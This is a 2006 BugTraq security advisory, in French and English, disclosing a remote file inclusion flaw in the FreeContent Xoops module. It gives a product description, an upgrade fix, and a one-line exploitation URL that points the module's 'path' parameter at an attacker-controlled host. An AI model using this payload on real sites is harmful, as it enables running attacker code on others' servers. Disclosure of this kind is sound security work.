BugTraq in French
FreeContent : Remote File Inclusion Apr 14 2006 12:11PM
Silitix gmail com
Produit : FreeContent

La vulnérabilité a été identifié dans la version 2.9 et 3.0. D'autres versions peuvent également être affectées.

Problème : Remote File Inclusion

Site officiel : http://www.wjue.org/ & http://www.guanxicrm.com/

Auteur : Silitix - Silitix (at) gmail (dot) com [email concealed]

Description FR :
#################

Il fut le premier de sa génération concernant l'insertion de page HTML sur xoops, maintenant détroné par CJay-Content
une sorte de copie, freeContent est malgré lui toujours sur la place !
Il permet l'insertion de page html ou php que vous aurez au préalablement déposez sur votre serveur.
Dans cette nouvelle version 2.9, il a un début de reconnaissance concernant les liens URL qui se trouveraient dans
vos pages... contrairement à "C-Jay" qui ne gère pas encore çà !
Vous pourrez également cacher certaines pages pour ne pas qu'elles apparaissent dans le bloc.

Description ENG :
#################

With WebDigest capability FreeContent becomes the first Knowledge oriented content tool for Xoops.
FreeContent allows you not only to present easily a variety of contents but also to make concept/topic oriented
WebIntelligence, to organize
community discussion with always up to date and fresh content and information.
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics to automatically generate
relevant contents for your website.

Exploitation :
#############

http://[target]/modules/freecontent/index.php?path=[attacker]

Solution
#########

Appliquer la mise à jour disponible sur le sitte officiel, les versions 3.1/3.2 ne sont pas affectées.

###### ---- > Avis de sécurité original : www.Silitix.com/freecontent.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus